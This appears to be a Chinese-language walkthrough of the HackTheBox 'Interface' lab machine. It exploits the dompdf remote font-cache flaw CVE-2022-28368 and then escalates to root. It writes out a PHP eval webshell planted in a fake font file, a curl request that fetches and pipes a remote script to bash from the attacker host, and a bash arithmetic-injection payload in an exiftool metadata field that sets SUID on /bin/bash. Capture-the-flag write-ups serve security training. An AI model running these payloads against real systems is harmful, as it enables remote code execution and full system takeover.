admin 管理员组文章数量: 887007
hackthebox htb interface:CVE
本题考察:CVE-2022-28368
CVE-2022-28368 - 通过远程 CSS 字体缓存安装的 RCE
参考:
.htmlhackthebox-interface信息搜集nmap扫描端口发现开放的22和80PORT STATE SERVICE REASON22/tcp open ssh syn-ac....html
dompdf-rce/exploit
cd /tmp;
git clone
cd dompdf-rce;
cd /tmp/dompdf-rce/exploit/;
cat exploit.css
sed -i "s/localhost:9001/10.10.14.53/g" exploit.css;
cp exploit_font.php exploit_font.php.bak;sed -i "s|\(<?php phpinfo(); ?>\)|<?php eval(\$_POST[2]);|g" exploit_font.php;
tail exploit_font.php;cd /tmp/dompdf-rce/exploit/;
python -m http.server 80 &
接下来发post包(win10 x64 cmd下):
注意^< 和 ^>做了转义
-x 是走BurpSuite的http8080代理,不需要走代理可以删除.
curl -v -x http://127.0.0.1:8080 -d "{\"html\": \"title=^<link rel=stylesheet href='.css'^>\"}" "/api/html2pdf"
计算md5:
echo -n ".php" | md5sum
ae6cfa0a356a3b98582afa39ee67bf43 -
最后反弹shell:
curl -v -x http://127.0.0.1:8080 -d "2=system('curl+10.10.14.53:30088/ccc.sh|bash');" /vendor/dompdf/dompdf/lib/fonts/exploitfont_normal_ae6cfa0a356a3b98582afa39ee67bf43.php
路径要注意:
/vendor/dompdf/dompdf/lib/fonts/exploitfont_normal_ae6cfa0a356a3b98582afa39ee67bf43.php
接下来提权:
bash-4.4$ grep bash /etc/passwd;
root:x:0:0:root:/root:/bin/bash
dev:x:1000:1000:,,,:/home/dev:/bin/bash
bash-4.4$
上传pspy64工具到靶机,运行看一下进程。
发现了一个root权限运行的,访问用户的sh文件,很可疑
2023/05/20 10:41:25 CMD: UID=0 PID=1 | /sbin/init maybe-ubiquity
2023/05/20 10:42:01 CMD: UID=0 PID=33487 | /bin/bash /usr/local/sbin/cleancache.sh
2023/05/20 10:42:01 CMD: UID=0 PID=33486 | /bin/sh -c /usr/local/sbin/cleancache.sh
2023/05/20 10:42:01 CMD: UID=0 PID=33485 | /usr/sbin/CRON -f
2023/05/20 10:42:01 CMD: UID=0 PID=33490 | /bin/bash /usr/local/sbin/cleancache.sh
2023/05/20 10:42:01 CMD: UID=0 PID=33489 | /bin/bash /usr/local/sbin/cleancache.sh
2023/05/20 10:42:01 CMD: UID=0 PID=33488 | /bin/bash /usr/local/sbin/cleancache.sh
2023/05/20 10:42:01 CMD: UID=0 PID=33491 |
2023/05/20 10:42:01 CMD: UID=0 PID=33492 | /bin/bash /usr/local/sbin/cleancache.sh
2023/05/20 10:42:01 CMD: UID=0 PID=33494 | /bin/bash /usr/local/sbin/cleancache.sh
2023/05/20 10:42:01 CMD: UID=0 PID=33493 | /usr/bin/perl -w /usr/bin/exiftool -s -s -s -Producer /tmp/test_original
2023/05/20 10:42:01 CMD: UID=0 PID=33497 | /bin/bash /usr/local/sbin/cleancache.sh
2023/05/20 10:42:01 CMD: UID=0 PID=33496 | /usr/bin/perl -w /usr/bin/exiftool -s -s -s -Producer /tmp/yyxx
2023/05/20 10:42:01 CMD: UID=0 PID=33495 | /bin/bash /usr/local/sbin/cleancache.sh
ls -al /usr/local/sbin/cleancache.sh ;cat /usr/local/sbin/cleancache.sh ;#! /bin/bash
cache_directory="/tmp"
for cfile in "$cache_directory"/*; doif [[ -f "$cfile" ]]; thenmeta_producer=$(/usr/bin/exiftool -s -s -s -Producer "$cfile" 2>/dev/null | cut -d " " -f1)if [[ "$meta_producer" -eq "dompdf" ]]; thenecho "Removing $cfile"rm "$cfile"fifidone
cat <<EOF>/tmp/.xxyy.sh
#!/bin/bash
id>/tmp/.iidd123;
chattr +a /tmp/.iidd123;
chmod +s /bin/bash;
EOFchmod +x /tmp/.xxyy.sh;
chattr +a /tmp/.xxyy.sh;touch /tmp/.yy22;/usr/bin/exiftool -Producer='a[$(/tmp/.xxyy.sh>&2)]+42' /tmp/.yy22;ln -s /tmp/.yy22 /tmp/yy22;# /usr/bin/exiftool -s -s -s -Producer /tmp/.yy22 # /usr/bin/exiftool -s -s -s -Producer /tmp/.yy22 2>/dev/null | cut -d " " -f1
<pdf:Producer>x[$(touch /tmp/0xdf)]</pdf:Producer>bash-4.4$ /usr/bin/exiftool -s -s -s -Producer /tmp/test_original
x[$(touch /tmp/0xdf)]
bash-4.4$
实际上是if里触发执行的,测试命令如下:
meta_producer=$(echo "a[\$(/tmp/.xxyy.sh>&2)]+4");
echo "$meta_producer";if [[ "$meta_producer" -eq "dompdf" ]]; thenecho "Removing 123123"
fi
最后bash -p:
bash-4.4# cat /root/root.txt
02246920fd2785965ecf72ecaa22d8f3
bash-4.4#
bash-4.4# cat /home/dev/user.txt
f8e3acc434850f1527f6860f4b1222eb
bash-4.4#
事后:
# id
uid=0(root) gid=0(root) groups=0(root)
# crontab -l
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').#
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
#
# Output of the crontab jobs (including errors) is sent through
# email to the user the crontab file belongs to (unless redirected).
#
# For example, you can run a backup of all your user accounts
# at 5 a.m every week with:
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
#
# For more information see the manual pages of crontab(5) and cron(8)
#
# m h dom mon dow command
*/2 * * * * /usr/local/sbin/cleancache.sh
*/5 * * * * /root/clean.sh
# # bash
root@interface:/tmp# cat /root/clean.sh
#! /bin/bash
find /var/www/api/vendor/dompdf/dompdf/lib/fonts/ -type f -cmin -5 -exec rm {} \;
cp /root/font_cache/dompdf_font_family_cache.php.bak /root/font_cache/dompdf_font_family_cache.php
chown www-data /root/font_cache/dompdf_font_family_cache.php
chgrp www-data /root/font_cache/dompdf_font_family_cache.php
mv /root/font_cache/dompdf_font_family_cache.php /var/www/api/vendor/dompdf/dompdf/lib/fonts/dompdf_font_family_cache.php
root@interface:/tmp# root@interface:/tmp# uname -a
Linux interface 4.15.0-202-generic #213-Ubuntu SMP Thu Jan 5 19:19:12 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
root@interface:/tmp# cat /etc/os-release
NAME="Ubuntu"
VERSION="18.04.6 LTS (Bionic Beaver)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 18.04.6 LTS"
VERSION_ID="18.04"
HOME_URL="/"
SUPPORT_URL="/"
BUG_REPORT_URL="/"
PRIVACY_POLICY_URL=""
VERSION_CODENAME=bionic
UBUNTU_CODENAME=bionic
root@interface:/tmp# free -htotal used free shared buff/cache available
Mem: 1.9G 233M 690M 14M 1.0G 1.5G
Swap: 1.0G 0B 1.0G
root@interface:/tmp# root@interface:/var/www/html# cat /var/www/api/vendor/dompdf/dompdf/VERSION;
1.2.0
root@interface:/var/www/html# bash-4.4$ cat /var/www/api/composer.json;
{"require": {"bramus/router": "~1.6","dompdf/dompdf": "1.2.0"}
}bash-4.4$
可参考文章:
CTF_challenges/MRCTF2022/tprint at main · Snakinya/CTF_challenges · GitHub
dompdf 0day(RCE)复现 | 郁涛丶's Blog
本文标签: hackthebox htb interfaceCVE
版权声明:本文标题:hackthebox htb interface:CVE 内容由网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:http://www.freenas.com.cn/jishu/1732355883h1534423.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论